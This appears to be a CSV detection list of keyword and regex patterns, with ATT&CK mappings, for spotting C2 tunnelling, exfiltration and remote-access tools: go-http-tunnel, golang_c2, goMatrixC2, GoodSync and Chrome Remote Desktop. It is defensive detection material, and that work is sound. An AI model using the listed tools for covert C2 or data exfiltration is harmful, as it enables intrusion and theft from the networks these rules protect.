"*8f904a5fd2b5c821121ad0003e3f4021cc5f1c2969d14e64e67ce35721ab6f70*",".{0,1000}8f904a5fd2b5c821121ad0003e3f4021cc5f1c2969d14e64e67ce35721ab6f70.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*9684712e7ea18e0e82bbdf8b990173349ac97423ab59b0daa265a222cfbef816*",".{0,1000}9684712e7ea18e0e82bbdf8b990173349ac97423ab59b0daa265a222cfbef816.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*9dc3c784b09c7e143046fee8b0b96f2b2c92fa95aad96679e0ab79383e20647c*",".{0,1000}9dc3c784b09c7e143046fee8b0b96f2b2c92fa95aad96679e0ab79383e20647c.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*a11a44666cbdc5c56112cdb109e37c7f4f466f947500efce2192007d553a07f5*",".{0,1000}a11a44666cbdc5c56112cdb109e37c7f4f466f947500efce2192007d553a07f5.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*a5dd833c5c1f9ac79705b4fddd9d9e7dde9b25f5bbf79a7dc1c00537f181f47a*",".{0,1000}a5dd833c5c1f9ac79705b4fddd9d9e7dde9b25f5bbf79a7dc1c00537f181f47a.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*aacf0692bcac39321f5f427164f6807107ae9bc75404a07d009f553710d9bc55*",".{0,1000}aacf0692bcac39321f5f427164f6807107ae9bc75404a07d009f553710d9bc55.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*b3f0715b807f2c31670a389cb430f01423f281d38f44e93d53e5fb2732406173*",".{0,1000}b3f0715b807f2c31670a389cb430f01423f281d38f44e93d53e5fb2732406173.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*bb5f01316e315e4a9039a17dd2358cec0a86cac566638d8ce5e2ce0b5ebc1fbf*",".{0,1000}bb5f01316e315e4a9039a17dd2358cec0a86cac566638d8ce5e2ce0b5ebc1fbf.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*c6b4e0b176b29a3a2bf68e702195cbf72d705f8c6419ac17e7bfd16b18429447*",".{0,1000}c6b4e0b176b29a3a2bf68e702195cbf72d705f8c6419ac17e7bfd16b18429447.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*cbdf3b97f6a72121a00e8f14fd0bbd564aefc6edfde0b9449f1613559678d09f*",".{0,1000}cbdf3b97f6a72121a00e8f14fd0bbd564aefc6edfde0b9449f1613559678d09f.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*cc3badcfbd2bad09f5a4312eabdc50b2d2259cbac5429deb6e53340468c7b7b0*",".{0,1000}cc3badcfbd2bad09f5a4312eabdc50b2d2259cbac5429deb6e53340468c7b7b0.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*cde0f088445933eef88c2663bf2684f6e020d30347a7a230658d534c05f4e8d9*",".{0,1000}cde0f088445933eef88c2663bf2684f6e020d30347a7a230658d534c05f4e8d9.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*cf418ac948b21bbed8565d6f11419405aa7b25d3c37b8a2b212e85f6aa76d233*",".{0,1000}cf418ac948b21bbed8565d6f11419405aa7b25d3c37b8a2b212e85f6aa76d233.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*d5e79002815d4d904942d07786fab82492f83912d175804e21c059c00efe3d95*",".{0,1000}d5e79002815d4d904942d07786fab82492f83912d175804e21c059c00efe3d95.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*e7f434888e992b2679e221199354f80eaee1e7c3c546043f37aeefa3fbe252ae*",".{0,1000}e7f434888e992b2679e221199354f80eaee1e7c3c546043f37aeefa3fbe252ae.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*edb84e2914bb1bd31a213b87aabd387999159093c5c00138cbc8f8f8fdc77fb1*",".{0,1000}edb84e2914bb1bd31a213b87aabd387999159093c5c00138cbc8f8f8fdc77fb1.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*f0ded25a361ea53de7518a357c03d733d8caf206f7a90a8e3b4d6a29563c9277*",".{0,1000}f0ded25a361ea53de7518a357c03d733d8caf206f7a90a8e3b4d6a29563c9277.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*f955157646e94bed38b8e4d6ce6df58489eeb89ebf0d44ffe03b3c4902dc5d4e*",".{0,1000}f955157646e94bed38b8e4d6ce6df58489eeb89ebf0d44ffe03b3c4902dc5d4e.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","#filehash","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*mmatczuk/go-http-tunnel.git*",".{0,1000}mmatczuk\/go\-http\-tunnel\.git.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","1","N/A","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*tunnel -config *tunnel.yml*",".{0,1000}tunnel\s\-config\s.{0,1000}tunnel\.yml.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","N/A","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*tunneld -tlsCrt *",".{0,1000}tunneld\s\-tlsCrt\s.{0,1000}","greyware_tool_keyword","go-http-tunnel","Fast and secure tunnels over HTTP/2","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/mmatczuk/go-http-tunnel","1","0","N/A","N/A","10","10","3215","304","2024-04-19T12:25:30Z","2016-10-12T12:59:38Z"
"*http://127.0.0.1:8000/gate.html*",".{0,1000}http\:\/\/127\.0\.0\.1\:8000\/gate\.html.{0,1000}","greyware_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021  -  T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","N/A","10","10","5","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z"
"*ckiahbcmlmkpfiijecbpflfahoimklke*",".{0,1000}ckiahbcmlmkpfiijecbpflfahoimklke.{0,1000}","greyware_tool_keyword","Gom VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*https://matrix.org/_matrix/client/r0/rooms/*/send/m.room.message*",".{0,1000}https\:\/\/matrix\.org\/_matrix\/client\/r0\/rooms\/.{0,1000}\/send\/m\.room\.message.{0,1000}","greyware_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","0","N/A","N/A","10","","N/A","","",""
"*/GoodSync-vsub-Setup.exe*",".{0,1000}\/GoodSync\-vsub\-Setup\.exe.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\CurrentControlSet\Services\GsServer*",".{0,1000}\\CurrentControlSet\\Services\\GsServer.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","#registry","N/A","9","10","N/A","N/A","N/A","N/A"
"*\DIRECTORY\BACKGROUND\SHELL\GOODSYNC*",".{0,1000}\\DIRECTORY\\BACKGROUND\\SHELL\\GOODSYNC.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\GoodSync-2*-*.log*",".{0,1000}\\GoodSync\-2.{0,1000}\-.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\GOODSYNC2GO.EXE*",".{0,1000}\\GOODSYNC2GO\.EXE.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\GOODSYNC2GO-V*.EXE*",".{0,1000}\\GOODSYNC2GO\-V.{0,1000}\.EXE.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\GoodSync-vsub-Setup.exe*",".{0,1000}\\GoodSync\-vsub\-Setup\.exe.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\gs-runner.exe*",".{0,1000}\\gs\-runner\.exe.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\GS-SERVER.EXE*",".{0,1000}\\GS\-SERVER\.EXE.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\Program Files\SIBER SYSTEMS\GOODSYNC\*",".{0,1000}\\Program\sFiles\\SIBER\sSYSTEMS\\GOODSYNC\\.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\Siber Systems\GoodSync\*",".{0,1000}\\Siber\sSystems\\GoodSync\\.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\Users\*\AppData\Local\GoodSync*",".{0,1000}\\Users\\.{0,1000}\\AppData\\Local\\GoodSync.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*>GoodSync<*",".{0,1000}\>GoodSync\<.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*>gs-runner.exe<*",".{0,1000}\>gs\-runner\.exe\<.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*Copy New *gdrive://www.googleapis.com/GS_Sync/*",".{0,1000}Copy\sNew\s.{0,1000}gdrive\:\/\/www\.googleapis\.com\/GS_Sync\/.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*Copy New *sftp://*",".{0,1000}Copy\sNew\s.{0,1000}sftp\:\/\/.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*GoodSync Server*",".{0,1000}GoodSync\sServer.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","Service Name","9","10","N/A","N/A","N/A","N/A"
"*GoodSync-vsub-2Go-Setup.exe*",".{0,1000}GoodSync\-vsub\-2Go\-Setup\.exe.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","1","N/A","portable version","9","10","N/A","N/A","N/A","N/A"
"*mediator.goodsync.com*",".{0,1000}mediator\.goodsync\.com.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*Program Files\Siber Systems\GoodSync*",".{0,1000}Program\sFiles\\Siber\sSystems\\GoodSync.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*SOFTWARE\Siber Systems\GoodSync\Profiles*",".{0,1000}SOFTWARE\\Siber\sSystems\\GoodSync\\Profiles.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","#registry","N/A","9","10","N/A","N/A","N/A","N/A"
"*temp*\gsync.exe*",".{0,1000}temp.{0,1000}\\gsync\.exe.{0,1000}","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"* chrome-remote-desktop@*",".{0,1000}\schrome\-remote\-desktop\@.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*.chrome-remote-desktop-session*",".{0,1000}\.chrome\-remote\-desktop\-session.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/system/chrome-remote-desktop@*",".{0,1000}\/system\/chrome\-remote\-desktop\@.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Chrome Remote Desktop\host.json*",".{0,1000}\\Chrome\sRemote\sDesktop\\host\.json.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Google\Chrome Remote Desktop\*",".{0,1000}\\Google\\Chrome\sRemote\sDesktop\\.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\pipe\chrome_remote_desktop*",".{0,1000}\\pipe\\chrome_remote_desktop.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","#namedpipe","N/A","10","10","N/A","N/A","N/A","N/A"
"*\remote_assistance_host.exe*",".{0,1000}\\remote_assistance_host\.exe.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\remoting_desktop.exe*",".{0,1000}\\remoting_desktop\.exe.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\remoting_host.exe*",".{0,1000}\\remoting_host\.exe.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\remoting_native_messaging_host.exe*",".{0,1000}\\remoting_native_messaging_host\.exe.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\remoting_start_host.exe*",".{0,1000}\\remoting_start_host\.exe.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<Data>Product: Chrome Remote Desktop Host*",".{0,1000}\<Data\>Product\:\sChrome\sRemote\sDesktop\sHost.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<Provider Name=""chromoting"" />*",".{0,1000}\<Provider\sName\=\""chromoting\"".{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","windows event logs application provider name","10","10","N/A","N/A","N/A","N/A"
"*Channel IP for client: *@gmail.com/chromoting*",".{0,1000}Channel\sIP\sfor\sclient\:\s.{0,30}\@gmail\.com\/chromoting.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Chrome remote desktop installation completed*",".{0,1000}Chrome\sremote\sdesktop\sinstallation\scompleted.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","windows event logs application provider name","10","10","N/A","N/A","N/A","N/A"
"*chrome-remote-desktop.service*",".{0,1000}chrome\-remote\-desktop\.service.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*chrome-remote-desktop_current_amd64.deb*",".{0,1000}chrome\-remote\-desktop_current_amd64\.deb.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*chromeremotedesktophost.msi*",".{0,1000}chromeremotedesktophost\.msi.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*export CHROME_REMOTE_DESKTOP_DEFAULT_DESKTOP_SIZES*",".{0,1000}export\sCHROME_REMOTE_DESKTOP_DEFAULT_DESKTOP_SIZES.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*-Force Stop-Process -Name remote_webauthn*",".{0,1000}\-Force\sStop\-Process\s\-Name\sremote_webauthn.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*google-chrome-stable_current_amd64.deb*",".{0,1000}google\-chrome\-stable_current_amd64\.deb.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://remotedesktop.google.com/_/oauthredirect*",".{0,1000}https\:\/\/remotedesktop\.google\.com\/_\/oauthredirect.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://remotedesktop.google.com/headless*",".{0,1000}https\:\/\/remotedesktop\.google\.com\/headless.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*inomeogfingihgjfjlpeplalcfajhgai*",".{0,1000}inomeogfingihgjfjlpeplalcfajhgai.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*remotedesktop.google.com/access*",".{0,1000}remotedesktop\.google\.com\/access.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*remotedesktop.google.com/support*",".{0,1000}remotedesktop\.google\.com\/support.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
